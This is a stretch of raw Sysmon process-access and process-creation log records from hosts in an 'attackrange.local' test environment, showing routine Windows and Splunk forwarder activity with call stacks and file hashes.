08:04:23.058{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.043{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D452C862A80DE13A153ECD091B5C5BF,SHA256=A9B211394ED83B4C870B001B0ABDE7AD08A55157B84BD74D673A0B94464D6A79,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809740Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809739Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809738Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.994{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.979{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.979{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.979{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.980{0C1E0330-F788-60EB-C879-00000000D001}3708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.463{0C1E0330-F788-60EB-C779-00000000D001}12203892C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.307{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.291{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 